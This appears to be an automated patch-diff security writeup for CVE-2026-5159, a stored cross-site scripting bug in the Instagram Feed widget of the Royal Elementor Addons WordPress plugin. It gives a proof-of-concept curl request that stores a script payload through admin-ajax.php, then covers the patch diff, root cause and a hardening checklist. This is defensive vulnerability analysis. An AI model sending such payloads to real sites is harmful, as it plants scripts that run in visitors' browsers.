ANALYSIS · 48b99033· FINISHED 2026-05-06 · PATCHDIFF

Folder Analysiscache/royal-elementor-addons_1.7.1056 → cache/royal-elementor-addons_1.7.1057✓ COMPLETED

Files41

Vulnerable32

True positives0

CVE matched1

1 CVE article ready PatchLeaks generated full security writeups for the matched CVEs · one per CVE, with affected files linked

CVE-2026-5159

FILTERS 0

SEARCH

STATUS

JUDGE

CVE MATCH

EXTENSION

CWE

OPTIONS

Hide “No vulnerability” Hide unjudged

SCOPE

All 41 CVE 1 Vuln 32

SORT

1 files · page 1/1

modules/instagram-feed/widgets/wpr-instagram-feed.php

AI: 9 vulnerabilities

CVE-2026-5159

#%!d(float64=024)

1–1 of 1

⌖

Select a file from the list to inspect its diff and AI analysis.

↑ ↓ to navigate

CVES 1

CVE-2026-5159

Security writeup for CVE-2026-5159

✓ 1 FILE

## The Exploit

An authenticated contributor (or higher) can store script code in the Instagram Feed widget settings and make it execute for any later visitor.

```bash
# Store the payload in the Instagram Feed widget configuration
curl 'https://target.example/wp-admin/admin-ajax.php' \
  -H 'Cookie: wordpress_logged_in=YOUR_COOKIE_HERE' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'action=elementor_ajax' \
  --data-urlencode 'nonce=YOUR_NONCE_HERE' \
  --data-urlencode 'post_id=123' \
  --data-urlencode 'widgetType=wpr-instagram-feed' \
  --data-urlencode 'settings[instagram_follow_text]=<script>alert("XSS")</script>'
```

```bash
# Trigger the stored payload by loading the page containing the widget
curl 'https://target.example/test-page/' -i
```

The response contains the injected payload in the Instagram follow button text, e.g. `...<script>alert("XSS")</script>...`. Any visitor opening that page executes the stored script, proving a stored XSS vulnerability.

## What the Patch Did

Before:
```php
$instagram_follow_text = $settings['instagram_follow_text'];
echo '<a class="wpr-insta-follow-button" href="'. esc_url( $follow_url ) .'">'. $instagram_follow_text .'</a>';
```

After:
```php
$instagram_follow_text = sanitize_text_field( $settings['instagram_follow_text'] );
echo '<a class="wpr-insta-follow-button" href="'. esc_url( $follow_url ) .'">'. esc_html( $instagram_follow_text ) .'</a>';
```

The patch added WordPress sanitization and output escaping: `sanitize_text_field()` on the stored widget setting and `esc_html()` when printing it to the page.

## Root Cause

This is a classic stored Cross-Site Scripting bug (CWE-79). The attacker-controlled widget setting `instagram_follow_text` entered through Elementor’s widget save flow and was persisted without sanitization. Later, that same value was rendered directly into page HTML as the Instagram follow button label, crossing the boundary from untrusted admin-supplied configuration into a visitor-facing output sink with no escaping.

## Why It Works

The load-bearing fix is the output escape `esc_html( $instagram_follow_text )`. Without that line, any `<script>` tag or HTML payload in `instagram_follow_text` would be emitted verbatim into the page and execute in the browser. The additional `sanitize_text_field()` line is useful for defense-in-depth and ensures stored data is text-only, but the critical protection is encoding the value at the moment it reaches the HTML sink.

## Hardening Checklist

- Escape all widget settings at render time with `esc_html()`, `esc_attr()`, or `esc_url()` depending on context.
- Sanitize incoming widget data with WordPress APIs like `sanitize_text_field()` before storage.
- Protect AJAX widget save endpoints with `check_ajax_referer()` and capability checks such as `current_user_can('edit_posts')`.
- Audit Elementor widget templates for direct output of `settings[...]` values and replace raw interpolation with escaping functions.
- Avoid rendering untrusted configuration values inside HTML attributes or element content without explicit encoding.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-5159

CVE CVE-2026-5159

PRODUCT Folder Analysis

AFFECTED ≤ cache/royal-elementor-addons_1.7.1056

FIXED IN cache/royal-elementor-addons_1.7.1057

STATUS Generated

Security writeup · CVE-2026-5159

Source files · 1

modules/instagram-feed/widgets/wpr-instagram-feed.php Linked

↗ NVD